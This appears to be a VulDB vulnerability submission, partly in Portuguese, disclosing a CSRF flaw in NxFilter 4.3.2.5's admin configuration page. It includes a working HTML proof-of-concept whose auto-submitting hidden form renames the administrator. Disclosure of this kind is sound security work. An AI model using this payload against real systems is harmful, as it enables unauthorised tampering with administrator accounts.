Submeter #249432: Nxfilter NxFilter 4.3.2.5 4.3.2.5 CSRFinformação

TítuloNxfilter NxFilter 4.3.2.5 4.3.2.5 CSRF
DescriçãoA CSRF is present in https://APP.COM/config,admin.jsp where a malicious user change the username of the administrator through a CSRF. If the Admin clicks on the link, his name can be changed by the name the hacker want. Exploit in HTML: <!DOCTYPE html> <html lang="en"> <head> </head> <body> <form id="configForm" action="https://192.168.0.134/config,admin.jsp" method="POST"> <!-- Campos do formulário --> <input type="hidden" name="actionFlag" value="update"> <input type="text" name="admin_name" value="hacker" style="display: none;"> <!--name here--> <!-- Botão para enviar o formulário --> <button type="submit">Enviar Requisição</button> </form> </body> <script> document.getElementById('configForm').submit(); </script> </html>
Fonte⚠️ https://APP.COM/config,admin.jsp
Utilizador
 0xgordo (UID 50709)
Submissão08/12/2023 17h26 (há 3 anos)
Moderação17/12/2023 09h25 (9 days later)
EstadoAceite
Entrada VulDB248266 [Jahastech NxFilter 4.3.2.5 /config,admin.jsp admin_name Falsificação de Pedido entre Sites]
Pontos17

VoltarVisão GeralPróximo

Might our Artificial Intelligence support you?

Check our Alexa App!